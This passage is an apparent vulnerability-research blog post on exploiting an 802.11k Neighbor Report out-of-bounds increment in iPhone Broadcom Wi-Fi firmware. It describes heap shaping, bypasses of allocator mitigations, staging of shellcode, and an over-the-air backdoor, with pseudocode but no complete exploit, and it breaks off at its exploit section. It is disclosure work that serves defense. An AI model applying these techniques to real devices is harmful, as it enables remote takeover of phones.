As we can see, the function performs some preliminary operations, before handing off processing to one of the numerous handlers within the firmware. Each action frame category is delegated to a single handler. Counting the action frame handlers and corresponding frame types supported by the iPhone’s firmware, we find 13 different supported categories, resulting in 34 different supported frame types. This is a substantial attack surface to explore!

To assess the handlers’ security, we’ll reverse-engineer each of the above functions. While this is a slow and rather tedious process, recall that each vulnerability found in the above handlers implies a triggerable over-the-air vulnerability in the Wi-Fi chip.

Before attempting a manual audit, we also “fuzzed” the action frame handlers. To do so, we developed an on-chip Wi-Fi fuzzer, allowing injection of frames directly into the aforementioned handler functions (without transmitting the frames over-the-air). While the fuzzer allowed for high-speed injection of frames (namely, thousands of frames per second), running it using a small corpus of action frames and inducing bit-flips in them was unfruitful... One possible explanation for this approach’s failure is due to the strict structure mandated by many action frames. Perhaps these results could be improved by fuzzing based on a grammar derived from the Wi-Fi standard, or enforcing structure constraints on the fuzzed content.

Regardless, we can employ some tricks to speed up our manual exploration. Recall that Wi-Fi primarily relies on Information Elements (IEs), tagged bundles of data, to convey information. The same principle applies to action frames -- their payloads typically consist of multiple IEs, each encapsulating different pieces of information relating to the handled frame. As the IE tags are (mostly) unique within the Wi-Fi standard, we can simply lookup the tag value corresponding to each processed IE, allowing us to quickly familiarise ourselves with the surrounding code.

After going through the handlers outlined above, we identified a number of vulnerabilities.

First, we discovered a vulnerability in 802.11v Wireless Network Managements (WNM). WNM is a set of standards allowing clients to configure themselves within a wireless network and to exchange information about the network’s topology. Within the WNM category, the “WNM Sleep Mode Response” frame serves to update the Group Temporal Key (GTK) when the set of peers in the network changes. As it happens, reverse-engineering the WNM handler revealed that the corresponding function failed to verify the length of the encapsulated GTK, thereby triggering a controlled heap overflow (see the bug tracker for more information).

By cross-referencing the GTK handling method, we were able to identify a similar vulnerability in 802.11r Fast BSS Transition (FBT). Once again, the firmware failed to verify the GTK’s length, resulting in a heap overflow.

While both of the above vulnerabilities are interesting in their own right, we will not discuss them any further in this blog post. Instead, we’ll focus on a different vulnerability altogether; one with a weaker primitive. By demonstrating how even relatively “weak” primitives can be exploited on the Wi-Fi firmware, we’ll showcase the need for stronger exploit mitigations.

To make matters more interesting, we’ll construct our entire exploit using nothing but action frames. These frames are so feature-rich, that by leveraging them we will be able to perform heap shaping, create allocation primitives, and of course, trigger the vulnerability itself.
802.11k Radio Resource Management

802.11k is an amendment to the Wi-Fi standard aiming to bring Radio Resource Management (RRM) capabilities to Wi-Fi networks. RRM-capable stations in the network are able to perform radio measurements (and receive them), allowing access points to reduce the congestion and improve traffic utilisation in the network. The concept itself is not new in the mobile sphere; in fact, it’s been around in cellular networks for over two centuries.

Within the Wi-Fi ecosystem, RRM is commonly utilised in tandem with 802.11r FBT (or the proprietary CCKM) to enable seamless access point assisted roaming. As stations decide to “handover” to different access points (based on their radio measurements), they can consult the access points within the network in order to obtain a list of potential neighbours with which they may reassociate.

To implement all of the above, a set of action frames (and a new action category) have been added to the Wi-Fi standard. Consequently, clients can perform radio and link measurement requests, receive the corresponding reports, and even process reports containing their neighbouring access points (should they decide to roam).

All of the above functionality is also present in the Wi-Fi firmware on the iPhone:

Auditing the handlers above, we come across one function of particular note; the handler for Neighbor Report Response frames.
The Vulnerability

Neighbor Report Response (NRREP) frames are reports delivered from the access point to stations in the network, informing stations of neighbouring access points in their vicinity. Upon roaming, the stations may use these parameters to reassociate with the aforementioned neighbours. Providing this information spares the stations the need to perform extensive scans on their own -- a rather time consuming operation. Instead, they may simply rely on the report, informing it of the specific channels and operating classes inhabited by each neighbour.

Like many action frames, NRREPs also contain a “dialog token” (9.6.7.7). This 1-byte field is used to correlate between requests issued by a client, and their corresponding responses. As their name implies, Neighbour Report Responses are typically transmitted in response to a corresponding request made by the client earlier on (commonly as a result of a radio measurement indicating that a roam may be imminent). As we’d expect, upon sending a Neighbor Report Request, the client generates and embeds a dialog token, which in later verified by it when processing the corresponding NRREP returned by the access point.

However, reading more carefully through the specification reveals another interesting scenario! It appears that NRREPs may also be entirely unsolicited. In such a case, the dialog token is simply set to zero, indicating that no matching request exists.


IEEE 802.11-2016, 9.6.7.7

Consequently, NRREPs may be transmitted over the network to any client at any time, so long as it supports 802.11k RRM. Upon reception of such a report (with a zeroed dialog token), the client will simply parse the request and handle the data therein.

Continuing to read through the standard, we can piece together the frame’s overall structure; starting from the action frame header, all the way the encapsulated IE:

As we can see above, the bulk of the data in the NRREP frame is conveyed through the “Neighbour Report” IE. NRREPs may contain one or more such IEs, each indicating the presence of a single neighbour.

Now that we have a firm understanding of the frame’s structure, let’s take a look at the firmware’s implementation of the functionality described above. Following along from the initial NRREP handler, we quickly come to a ROM function responsible for handling the reports. Reverse-engineering the function, we arrive at the following high-level logic:

1. int wlc_rrm_recv_nrrep(void* ctx, ..., uint8_t* body, uint32_t bodylen) {
2.
3. //Ensuring the request is valid
3. if (bodylen <= 2 || !g_rrm_enabled || body[2] != stored_dialog_token)
4. ... //Handle error
5.
6. //Freeing all the previously stored reports
7. free_previous_nrreps(ctx, ...);
8.
9. //Stripping the action Header
10 uint8_t* report_ie = body + 3;
11. bodylen -= 3;
12.
13. //Searching for the report IE
14. do {
15. ... //Verify the IE is valid
16. if (report_ie[0] == 52 && report_ie[1] > 0xC) //Tag, Length
17. break; //Found a matching IE!
18. } while (report_ie = bcm_next_tlv(report_ie, &bodylen));
19. if (!report_ie)
20. ... //Handle error
21.
22. //Handle the report
23. uint8_t* nrrep_data = malloc(28);
24. if (!nrrep_data)
25. ... //Handle error
26.
27. memcpy(nrrep_data + 6, report_ie + 2, 6); //Copying the BSSID
28. ... //Copying other elements...
29. nrrep_data[16] = report_ie[12]; //Operational Class
30. nrrep_data[17] = report_ie[13]; //Channel Number
31.
32. //Processing the report
33. void* elem = wlc_rrm_regclass_neighbor_count(ctx, nrrep_data, ...);
34. ...
35. }

As we can see above, the function begins by performing some cursory validation of the received request. Namely, it ensures that RRM is enabled within the network, that the report is sufficiently long, and that the received dialog token matches the stored one (if a solicited request was initiated by the client, otherwise the stored token is set to zero).

After performing the necessary validations and locating the report IE, the function proceeds to extract the encoded report information and store it within a structure of its own. Finally, the newly created structure is passed on for processing within wlc_rrm_regclass_neighbor_count. Let’s take a closer look:

1. void* wlc_rrm_regclass_neighbor_count(void* ctx, uint8_t* nrrep_data, ...) {
2.
3. //Searching for previous stored elements with the same Operational
4. //Class and Channel Number
5. if (find_nrrep_buffer_and_inc_channel_idx(ctx, nrrep_data, ...))
6. return NULL;
7.
8. //Creating a new element to hold the NRREP data
9. uint8_t* elem = zalloc(456);
10. if (!elem)
11. ... //Handle error
12. elem[4] = nrrep_data[16]; //Operational Class
13. ((uint16_t*)(elem + 6))[nrrep_data[17]]++; //Channel Number
14.
15. //Adding the element to the linked list of stored NRREPs
16. *((uint8_t**)elem) = ctx->previous_elem;
17. ctx->previous_elem = elem;
18. return elem;
19. }

As shown in the snippet above, the firmware keeps a linked list of buffers, one per “Operational Class”. Each buffer is 456 bytes long, and contains the operational class, an array holding the number of neighbours per channel, and a pointer to the next buffer in the list.

While not shown above, find_nrrep_buffer_and_inc_channel_idx performs a similar task - it goes over each element in the list, looking for an entry matching the current operational class. Upon finding a matching element, it increments the neighbour count at the index corresponding to the given channel number, and returns 1, indicating success.

So why are these handlers interesting? Consider that valid 802.11 channel numbers range from 1-14 in the 2.4GHz spectrum, all the way up to 196 in the 5GHz spectrum. Since each neighbour count field in the array above is 16-bits wide, we can deduce that the neighbour count array can be used to reference channel numbers up to 224 ((456 - 6)/sizeof(uint16_t) == 224).

However, looking a little closer it appears that the functions above make no attempt to validate the Channel Number field! Therefore, malicious attackers can encode whatever value they desire in that field (up to 255). Encoding a value larger than 224 will therefore trigger a 16-bit increment to be performed out-of-bounds (see line 13), thereby corrupting memory after the NRREP buffer!
Understanding The Primitive

Before we move on, let’s take a second to understand the exploit primitive -- as mentioned above, we are able to perform 16-bit increments (which are also 16-bit aligned), spanning up to 60 bytes beyond our allocated buffer.

Oddly, while the standards specify that each NRREP may contain several encoded reports (each of which should be handled by the receiving station), it appears that the handler functions above only processes a single IE at a time. Therefore, each NRREP we send will be able to trigger a single OOB increment.

9.6.7.7

This last fact ties in rather annoyingly with another quirk in the firmware’s code -- namely, upon reception of each NRREP, the list of stored NRREP elements is freed before proceeding to process the current element (see line 7, where free_previous_nrreps is invoked). It remains unclear whether this is intended behaviour or a bug, but the immediate consequence of this oddity is that following each OOB increment, the buffers are subsequently freed, allowing other objects to take their place.

Lastly, the reception of each NRREP triggers two allocations of distinct sizes; one for the linked list element (456 bytes), and another to store the report’s data (28 bytes). As a result, any heap shaping or grooming we’ll perform will have to take both allocations into consideration.
Triggering The Vulnerability
Configuring The Network

To begin developing our exploit, we’ll use the same test network environment we described in the previous blog post, using the following topology:

As we’re going to leverage NRREPs, it’s important to set up our test network to support neighbour reports. Like many auxiliary Wi-Fi features, support for NRREPs is indicated by setting the corresponding bit in the capability IEs broadcast in the network’s beacon. RRM-related functionality is encoded using the “RM Enabled Capabilities” information element.

Since we’re using hostapd to broadcast our network, we’ll enable the rrm_neighbor_report setting in our network’s configuration. Enabling this feature should set the corresponding field in the “RM Enabled Capabilities” IE to indicate support for neighbour reports. Let’s inspect a beacon frame to make sure:

Alright, seems like our network configuration is valid! Next, we’ll want to construct an interface allowing us to send arbitrary neighbour reports to peers in the network.

To do so, we’ll extend hostapd by adding new commands to its control interface. Each new command will correspond to a single frame type we’d like to inject. After adding our code to hostapd, we can simply connect to the control interface and issue the corresponding commands, thereby triggering the transmission of the requested frames from the access point to the selected peer. You can find our patches to hostapd in the exploit bundle on the bug tracker.

It should be noted that this approach is not infallible. Since we’re utilising a SoftMAC dongle to transmit our internal network, the SoftMAC layer of the Linux Kernel is responsible for some of the MLME processing done on the host. Therefore, it’s possible that processing done by this layer will interfere with the frames we wish to send (or receive) during the exploit’s flow. To get around this limitation, we’ve taken care to construct the frames in a manner that does not clash with Linux’s SoftMAC stack.
Sending NRREPs

After configuring and broadcasting our network, we can finally attempt to trigger the vulnerability itself. This brings us to a rather important question; how will we know whether the vulnerability was triggered successfully or not? After all, a single 16-bit increment may be insufficient to cause significant corruption of the firmware’s memory. Therefore it’s entirely possible that while the OOB access will occur, the firmware will happily chug along without crashing, leaving no observable effects indicating the vulnerability was triggered.

Remembering our Wi-Fi debugger from the previous blog post, one course of action immediately springs to mind -- why not simply hook the NRREP processing function with our own handler, and see whether our handler is invoked upon transmitting a malicious NRREP? This is easier said than done; it turns out most of the NRREP handling functionality (especially the actual vulnerability trigger, which we’re interested in) is located within the ROM, preventing us from inserting a hook.

As luck would have it, a new feature developed by Broadcom can be leveraged to solve this issue. To allow tracing different parts of the firmware’s logic, including the ROM, Broadcom have introduced a set of logging functions embedded throughout the firmware. Curiously, this mechanism was not present in the Android-resident firmwares we had analysed in the past.

Reverse-engineering this mechanism, it appears to operate in the following manner: each trace is assigned an identifier, ranging from 0x0 to 0x50. When a trace is requested, the firmware inspects an internal array of the same size stored in the firmware’s RAM, to gage whether the trace with the given identifier has been enabled or not. Each identifier has a corresponding 8-bit mask representing the types of traces enabled for it. As we are able to access the firmware’s RAM, we can simply enable any trace we like by setting the corresponding bits in the trace array. Subsequently, traces with the same ID will be outputted to the firmware’s console, allowing us to handily dump them using our Wi-Fi firmware debugger.

This functionality has also been incorporated into our Wi-Fi debugger, which exposes functions to read and modify the log status array as well as API to read out the firmware’s console.

Using the above API, we can now enable the traces referenced in the NRREP’s ROM handlers. Taking a closer look at the NRREP handling function in the firmware, we come across the following traces:

Alright, so we’ll need to enable log identifier 0x16 to observe these traces. After enabling the trace, sending an NRREP and reading out the firmware’s console, we are greeted with the following result:

Great! Our traces are being hit, indicating that the NRREP is successfully received by the station. With that, let’s move on to the next step - devising an exploit strategy.
An Exploit Strategy
Understanding The Heap

Since the vulnerability in question is a heap memory corruption, it’s important that we take a second to familiarise ourselves with the allocator’s implementation. In short, it is a “best-fit” allocator, which performs forward and backward coalescing, and keeps a singly linked list of free chunks. When chunks are allocated, they are carved from the end (highest address) of the best-fitting free chunk (smallest chunk that is large enough).

Free chunks consist of a 32-bit size field and a 32-bit “next” pointer, followed by the chunk’s contents. In-use chunks contain a single 32-bit size field, of which the top 30 bits denote the chunk’s size, and the bottom 2 bits indicate status bits. Putting it together, we arrive at the following layout:

Sketching An Exploit Strategy

Before we rush ahead, let’s begin by devising a strategy. We already know that our exploit primitive allows us to perform 16-bit increments, spanning up to 60 bytes beyond our allocated buffer.

It’s important to note that the heap’s state, perhaps surprisingly, is incredibly stable -- little to no allocations are performed. What little allocations are made, are immediately freed thereafter. As for frames carrying traffic (received or transmitted); they are not carved from the heap, but rather drawn from a special “pool”. As such, the presence of traffic should not affect the heap’s state.

The heap’s stability is a double-edged sword; on the one hand, we are guaranteed relative convenience when shaping and modifying the heap’s state, as no allocations other than our own will interfere with the heap’s structure. On the other hand, the set of allocations that can be made (and subsequently, targeted by us using the vulnerability primitive) is limited.

Indeed, going over the action frame handlers and searching for objects which may serve as viable targets for modification, we come up empty handed. The only data types that may be allocated either store their “interesting” data farther than 56 bytes away from their origin (accounting for the in-use chunk’s header), or simply do not contain “interesting” data for modification.

Perhaps, instead, we could leverage the heap itself to hijack the control flow? If we were able to hijack the “next” pointer of a free chunk and subsequently point it at a location of our choosing, we could overwrite the target address with a subsequent allocation’s contents. This prospect sounds rather alluring, so let’s try and pursue this route.
Writing An Exploit
Hijacking A Free Chunk

To hijack a free chunk, we’ll need to commandeer a chunk’s “next” pointer. Recall that our exploit primitive allows us some degree of control over neighbouring data structures. As such, let’s consider the following placement in which a free chunk is within range of the NRREP buffer:

Leveraging our OOB increment, we can directly modify the chunk’s “next” pointer by sending an NRREP request with the corresponding channel number. Naively, this would allow us to gain control over a free chunk in the heap, by simply directing the “next” at a location of our choosing.

However, this approach turns out to be infeasible.

In order to direct the “next” pointer at a meaningful address, we’d have to either know its value in advance (in order to calculate the number of increments required to convert the pointer from its current value to the target value), or we’d have to know the relative offset between its current value and the desired target.

As we do not know the exact addresses of heap chunks (nor would we want to resort to guessing them), the former option is ruled out. What about the latter approach? Recall that our primitive allows for 16-bit increments. Therefore, we can either increase the pointer’s value by 1 (by increment the bottom half word), or by 65536 (by incrementing the top half word).

Incrementing the pointer by 1 will result in an unaligned chunk address in the freelist. Recall, however, that our vulnerability primitive triggers deallocations on every invocation. As it happens, the allocator’s “free” function validates that each chunk in the freelist is aligned. When an unaligned block in encountered, it generates a fault and halts the firmware. Thus, an increment on of bottom half-word will result in the firmware crashing.

Incrementing the top half-word similarly fails; since all the heap’s chunks are less than 65536 away from the RAM’s end address, incrementing the top half-word will result in the “free” function attempting to access memory beyond the RAM, triggering an access violation and halting the firmware.

So how can we commandeer a free chunk nevertheless?

To do so we’ll need to use a more subtle approach - instead of modifying the free chunk’s contents directly, we’ll aim to achieve a layout in which two free chunks overlap one another, thereby causing allocations carved from one chunk to overwrite the metadata of the other (leading to control over the latter’s “next” pointer).

Heap Shaping

Achieving a predictable heap layout is key for a reliable exploit. As our current goal is to create a specific layout (namely, two overlapping heap chunks), we require setting up the heap in a manner which would allow us to achieve such a layout.

Classically, heap shaping is performed by leveraging primitives allowing for control either over an allocation’s lifetime, or optionally over the allocation’s size. Triggering allocations within the heap without immediately freeing them, allows us to fill “holes” in the heap, leading to a more predictable layout.

The allocator used in the firmware is a “best-fit” allocator which allocates from high addresses to lower ones. Consequently, if all “holes” in the heap of a certain size are filled, subsequent allocations of the same size (or larger) would be carved from the best-fitting chunk, proceeding from top to bottom, thus creating a linear allocation pattern.

To understand the Wi-Fi firmware’s heap layout, let’s take a snapshot of the heap’s state using our Wi-Fi debugger (repeating the process multiple times to account for any variability in the state):

As we can see, several small chunks are strewn across the heap, alongside a single large chunk. From the structure above, we can deduce that in order to create a predictable allocation pattern for our NRREP buffer, we’d simply need a shaping primitive allowing us to fill all the “holes” whose sizes match that of the NRREP buffer.

However, this is easier said than done. As we’ve mentioned before, little allocations occur during routine operations, and those that do are immediately freed thereafter. Combing through all the action frame handlers, we fail to find even a single instance of a memory leak (i.e., an allocation with infinite lifetime), or even an allocation that persists beyond the scope of the handlers themselves. Be that as it may, we do know of one mechanism, governed by action frames, which could offer a solution.

Normally, each Wi-Fi frame received by a station is individually acknowledged by transmitting a corresponding acknowledgement frame in response. However, many use-cases exist in which multiple frames are expected to be sent at the same time; requiring an acknowledgement for each individual frame in those cases would be rather inefficient. Instead, the 802.11n standard (expanding on 802.11e) introduced “Block Acknowledgements” (BA). Under the new scheme, stations may acknowledge multiple frames at once, by transmitting a single BA frame.

To utilise BAs, a corresponding session must first be constructed. This is done by transmitting an ADDBA Request (IEEE 802.11-2016, 9.6.5.2) from the originating peer to the responder, resulting in an ADDBA Response (9.6.5.3) being sent in the opposite direction, acknowledging a successful setup. Similarly, BAs can be torn down by sending a DELBA frame, indicating the BA should no longer be active. Each BA is identified by a unique Traffic Identifier (TID). While the standard specifies up to 16 supported TIDs, the firmware only supports the first 8, restricting the number of BAs possible in firmware to the same limit.

Since the lifetime of BAs is explicitly controlled by the construction of the corresponding BA sessions, they may constitute good heap shaping candidates. Indeed, going over the corresponding action frame handler in the firmware, it appears that every allocated BA results in a 164-byte allocation being made, holding the BA’s contents. The allocation persists until the corresponding DELBA is received, upon which the BA structure corresponding to the given TID is freed.

To use BAs in our network, we’ll add a new command to hostapd, allowing injection of both ADDBA and DELBA requests with crafted TIDs. Furthermore, we’ll take care to compile hostapd with support for 802.11n (CONFIG_IEEE80211N) and to enable it in our network (ieee80211n).

Putting the above together, we arrive at a pretty powerful heap shaping primitive! By sending ADDBA Requests, we can trigger the allocation of up to eight distinct 164-byte allocations. Better yet, we can selectively delete the allocations corresponding to each BA by sending a DELBA frame with the corresponding TID.

Having said that, two immediate downsides also spring to mind. First, the allocation size is fixed, therefore we cannot use the primitive to shape the heap for allocations smaller than 164 bytes. Secondly the contents of the BA buffers are uncontrolled by us (they mostly contain bit-fields used for reordering frames in the BA).
Attempting Overlapping Chunks

Using our shiny new shaping primitive, we can now proceed to shape the heap in a manner allowing the creation of overlapping chunks. To do so, let’s begin by allocating all the BAs, from 0 through 7. The first few allocations will fill in whatever holes can accommodate them within the heap. Subsequently, the rest of the allocations will be carved for the main heap chunk, advancing linearly from high addresses to lower ones.

(Grey blocks indicate free chunks)

Quite conveniently, as the allocation primitive is much larger than the “small buffer” allocated during the NRREP request, it allows the smaller holes in the heap, those large enough to hold the 28 byte allocation, to persist. Consequently, the “smaller buffer” is simply carved from one of the remaining holes, allowing us to safely ignore it.

Getting back to the issue at hand - in order to create an overlapping allocation, all we’d need to do is use the vulnerability primitive to increment the size field of one of the BAs. After growing the size by whichever amount we desire, we can proceed to delete the newly expanded BA, along with its neighbouring BAs, causing an overlapping allocation.

Unfortunately, running through the above scenario results in a resounding failure -- the firmware crashes upon any attempt to free a block causing an overlapping allocation…

To get down to the bottom of this odd behaviour, we’ll need to locate the source of the crash. Inspecting the AppleBCMWLANBusInterfacePCIe driver, it appears that whenever a trap is generated by the firmware, the driver simply collects the aforementioned crash data, and outputs it to the device’s syslog. Therefore, to inspect the crash report, we’ll simply dump the syslog using idevicesyslog. After generating a crash we are presenting with the following output:

Inspecting the source address of the crash in the firmware’s image, we come across an unfamiliar block of code in the “free” function, which was not present in prior firmware versions. In fact, the entire function seems to have many of these blocks… To understand this new code, let’s dig a little deeper.
New Mitigations

Going over the allocator’s “free” function, we find that in addition to freeing the blocks themselves, the function now performs several additional verifications on the heap’s structure, meant to ensure that it is not corrupted in any way. If any violations are detected, the firmware calls an “abort” function, subsequently causing the firmware to crash.

After reverse-engineering all the above validations, we arrive at the following list of mitigations:
The chunk’s bounds are compared against a pre-populated list of “allowed” regions.
The chunk is compared against all other chunks in the freelist, searching for overlaps.
The chunk is checked against a list of “disallowed” regions.
The chunk is ensured to be 4-byte aligned.

If any violation is detected, the firmware triggers the “abort” function, thereby halting execution.

It appears that Broadcom has done some hardening on the allocator! This is great from a security perspective, but rather bleak news for our exploit, as it appears that any attempt to create an overlapping pair of chunks will result in a crash. Perhaps we’re out of luck…

Bypassing Mitigation #1

...Or are we?

Instead of first increasing a heap block’s size, then freeing it to create overlapping chunks, let’s opt for different approach. We’ll arrange for the following layout; first, we’ll create two free chunks, which are not immediately adjacent to one another (to prevent the allocator from coalescing them). Then we’ll use the NRREP primitive to slowly increment the size of one block, until it overlaps the other.

However, as the NRREP primitive only allows us to modify data extending up to 60 bytes after the buffer, and each BA buffer is much larger in size (164 bytes), we’ll first need to devise a plan to get our NRREP buffer closer to a free chunk, without it actually impeding on the chunk (and thereby coalescing with it).

We’ll do so by leveraging a little trick. After allocating all the BAs, we’ll proceed to slightly increment the last BA’s size using the vulnerability primitive. Once that chunk is freed, a free chunk is subsequently created in its place, spanning the new expanded size instead of the original allocation’s size. Since the new free chunk extends into neighbouring BAs, the next BA allocation will therefore overlap a previously allocated BA. This allows us to effectively “sink” an allocation into neighbouring blocks, advancing the scope of influence of our NRREP buffer to previously unreachable objects!

As the allocator’s “malloc” function zeroes every chunk upon allocation, following the plan above will lead to BA6’s size being set to zero. However, there’s no need to fret, we can simply increase it using our NRREP primitive (as we’re now within range of BA6).

Next, we’ll increase BA6’s size slightly until it nearly overlaps with BA5. Then, we can free both BAs, and proceed to use the NRREP buffer to increase BA6’s free chunk until it overlaps with BA5’s. It’s important to note that since both “holes” are much smaller than the NRREP buffer, it won’t be placed within them, leaving us to utilise them as we please.

Bypassing Mitigation #2

Having created a pair of overlapping free-chunks, our first instinct is to carve an allocation from the encompassing chunk, thereby overwriting the other chunk’s metadata. To do so, we’ll need to find an allocation primitive allowing for control over its contents.

Recall that we have already searched for (and failed to locate) allocations with a controlled lifetime. Therefore, any allocation primitive we do find would be one with a limited lifespan. But alas, freeing an allocation carved from any of the overlapping chunks will lead us once again to the “free” function’s overlapping chunk mitigation, subsequently halting the firmware (and thwarting our attempt). Let’s take a closer look at the mitigation and see whether we can find a way around it.

Going through the code, it appears to have the following high-level logic:

1. //Calculating the current chunk’s bounds
2. uint8_t* start = (uint8_t*)cur + sizeof(uint32_t);
3. uint8_t* end = start + (cur->size & 0xFFFFFFFC);
4.
5. //Checking for intersection between the current chunk and each free-chunk
6. for (freechunk_t* p = get_freelist_head(); p != NULL; p = p->next) {
7. uint8_t* p_start = (uint8_t*)p;
8. uint8_t* p_end = p_start + (p->size & 0xFFFFFFFC) + 2 * sizeof(uint32_t);
9. if (end > p_start && p_end > start)
10. CRASH();
11. }

As we can see above, the code snippet above lacks checks for integer overflows! Therefore, by storing a sufficiently large size in a free chunk, the calculation of p_end will result in an integer overflow, leading the value stored to become a low address. Consequently, the expression at line 9 will always evaluate to “false”, allowing us to bypass the mitigation.

Great, so all we need to do is ensure that when overwriting BA5’s free chunk, we also set its size to an exorbitantly large value. Moreover, as we’re dealing with a “best-fit” allocator, such a chunk will never be the best fitting (as smaller chunks will always exist), therefore there’s no need to worry about the allocator using our malformed chunk in the interim.
Creating Overlapping Chunks

To proceed, we’ll need to locate an allocation primitive allowing control over its contents, and preferably also offering a controlled size. Using such a primitive, we’ll be able to create an allocation for which BA6’s free chunk is the best fitting, subsequently overwriting BA5’s free-chunk header.

Going through the action frame handlers once again, we find a near-fit; Spectrum Measurement Requests (SPECMEAS). In short, SPECMEAS frames (9.6.2.2) are action frames belonging to the Spectrum Management category. These requests are used by access points to instruct stations to perform various measurements and report the results back to the network.

Broadcom’s Wi-Fi firmware supports two different types of measurements; a “basic” measurement, and a “Clear Channel Assessment” (CCA) measurement. Upon receiving a SPECMEAS request, the firmware allocates a buffer in order to store the report’s data. For every “CCA” measurement received, 5 bytes are added to the buffer’s size. However, for every “CCA” measurement encountered, 17 bytes are added to the buffer, of which many contain attacker-controlled data!

Using this primitive we can therefore trigger allocations of sizes that are linear combinations of 5 and 17. For every 17-byte block corresponding to a “basic” measurement, we can control several of the embedded bytes (namely, those at indices [5,15], 2).

While not a perfect allocation primitive, it’ll have to do. Since there are more than eight subsequent controlled bytes for each “basic” measurement request, we can use them in order to overwrite BA5’s free chunk header (the 32-bit size and pointer fields). By using a linear combination of the sizes above, we’ll guarantee that the controlled bytes are aligned with BA5’s free chunk header. Lastly, the size of the allocation performed must also be chosen so that BA6’s free chunk is the best fitting (therefore forcing the allocation to be carved from it, rather than other free chunks). Putting it all together, we arrive at the following layout:


Overwrite Candidates

Now that we’re able to commandeer free chunks, we just need to find some overwrite candidates in order to hijack the control flow.

Whereas in the previous firmware versions we researched, in-use chunks contained the same fields as a free chunks (namely, 32-bit size and next fields), the current chunks’ formats make them incompatible with free chunks. Therefore, in-use chunks normally do not constitute valid targets to impersonate free chunks.

Nonetheless, it is not entirely impossible that such objects exists. For example, any in-use allocation starting with a 32-bit zero word would be a valid free chunk. Similarly, chunks could begin with 32-bit pointers to other data types, which themselves may constitute a valid chain of free chunks. Even better yet, any data structure in the firmware’s RAM (not only heap chunks) could conceivably masquerade as a free chunk, so long as it follows the above format.

To get to the bottom of this, we’ve written a short script that goes over the firmware’s contents, searching for blocks that match the aforementioned description. Each block we discover constitutes a potential overwrite target by directing our fake free chunk at it. Running the script on a RAM dump of the firmware, we are greeted with the following result:

Great, there appear to be several candidates for overwrite!

In our previous exploration of the Wi-Fi firmware, we identified a certain class of objects that made good targets for hijacking control flow -- timers. These structures hold function pointers denoting periodically invoked timer functions. While many such timers exist in the current firmware as well, they are rather hard to overwrite using the above primitive. First, they do not start with a 32-bit zero field (but rather with the magic value “MITA”). Second, each timer is a link in a doubly-linked list, whose contents are constantly manipulated. To overwrite a timer, we’d need to insert a valid element into the list.

Instead, going over the list of candidates above, we come across a structure within the “persist” segment, containing a block of function pointers. Using our firmware debugger, we can indeed verify that several of the function pointers within this structure are periodically invoked. Therefore, by finding a free chunk candidate within this block, we should be able to commandeer one of the aforementioned function pointers, directing it at a location of our choice.

Unfortunately, attempting to do so results in a resounding failure.
Bypassing Mitigation #3

Each attempt to allocate data on top of the aforementioned block of function pointers using SPECMEAS frames, immediately causes the firmware to halt. Inspecting the source of the crash leads us back to one of the mitigations we mentioned earlier on; the “disallowed ranges” list.

Apparently, the entire “persist” block is contained in the list of regions within which “free” operations must not occur. Consequently, without bypassing this mitigation, we will not be able to overwrite data within the aforementioned range.

Thinking about this mitigation for a moment, we come up with an interesting proposition: perhaps we could use our commandeered free chunk in order to overwrite the “disallowed ranges” list itself?

While the list’s contents lays within one of the disallowed zones, recall that this validation is only performed by the “free” function, whereas “malloc” will happily carve allocations at any address, without consulting the above list. Therefore, by pointing our free chunk to a location overlapping the “disallowed ranges” list, we can use a SPECMEAS frame to overwrite its contents (thereby nullifying its effect). While SPECMEAS frames are immediately freed after they are allocated, this is no longer a concern, as by the time the “free” occurs, the “disallowed ranges” will have already been overwritten!
Putting It All Together

Using the steps above, we can disable the “disallowed ranges” list, allowing us to subsequently use the commandeered free chunk in order to hijack one of the function pointers in the persist block. Finally, we simply require a means of stashing some shellcode in a predictable location within the firmware’s RAM. By doing so, we will be able to direct the aforementioned function pointer at our shellcode, leading to arbitrary code execution.

Since the addresses within the “persist” block are fixed, they make for prime candidates to store our shellcode. Searching through the block, we come across several potential overwrite candidates, any of which can be hijacked with our “fake” free chunk.

However, there’s one more hurdle to overcome -- the code we’re about to store must not be overwritten at any point. If the code is inadvertently overwritten, the firmware will attempt to execute a corrupted chunk of code, possibly leading it to crash.

To get around this limitation, we’ll use one more action frame: Radio Measurement Requests (RMREQ). These frames are part of the 802.11k RRM standard, and allow for periodic measurements to be performed (and reported) by the firmware. Similarly to SPECMEAS frames, their handler allocates several bytes of data for each measurement IE encoded in the request.

Most importantly, RMREQ frames include a field denoting the number of repetitions that stations should perform when receiving the scan request. Going through the specification reveals that this field also has a “special” value, allowing scans to continue indefinitely:


IEEE 802.11-2016, 9.6.7.3

By encoding this value in an RMREQ frame, we can guarantee that the corresponding allocated buffer will not be subsequently freed, therefore allowing safe storage of our code.

Lastly, we need to consider the problem of the shellcode’s internal structure. Unlike SPECMEAS frames which allowed us to control multiple bytes in each chunk of the allocated buffer, RMREQ frames only provide control over four subsequent bytes out of every 20-bytes allocated. Luckily, as Thumb is a dense instruction set, it allows us to cram two instruction into each 32-bit controlled word. Therefore, we can break up our shellcode using the following pattern: the first 16-bit word will encode an instruction of our choosing, whereas the second word will contain a relative branch to the next controlled chunk. Formatting our shellcode in this manner allows us to construct arbitrarily large chunks of shellcode:

Building a Backdoor

Combining all the primitives above, we can finally stash and execute a chunk of shellcode on the Wi-Fi firmware!

To allow for easier exploration of the firmware, it’s worth taking a moment to convert this rudimentary form of access to a more refined toolset. Otherwise, we’d have to resort to encoding all the post-exploitation logic using segmented chunks of shellcode -- not an alluring prospect.

We’ll begin by using the shellcode above to write a small “backdoor” into the firmware, which we’ll call the “initial payload”. This payload constitutes the most minimal backdoor imaginable; it simply intercepts the NRREP handler, and reads two 32-bit words from it, storing the value of one word into the address denoted by the other. The initial payload therefore allows us to perform arbitrary 32-bit writes to the firmware’s RAM, by sending crafted NRREP frames over-the-air.

Next, we’ll use the initial payload in order to write a more sophisticated one, which we’ll refer to as the “secondary payload”. This payload also intercepts the NRREP handler (replacing the previous hook), but allows for a far richer set of commands, namely:
Reading data from the firmware RAM
Writing to the firmware’s RAM
Executing a shellcode stub
Performing a CRC32 calculation on a block of data

The capabilities above allow us to fully control the firmware’s over-the-air, from the safety of a python script. Indeed, not unlike our research platform, we’ve implemented the protocols for communicating with the backdoor in python, allowing for APIs implementing all of the functionality above.

In fact, the two are so similar, that several of the research framework’s modules can be directly executed using the secondary payload, by simply replace the memory access APIs in the research framework with those offered by the secondary payload.
The Exploit

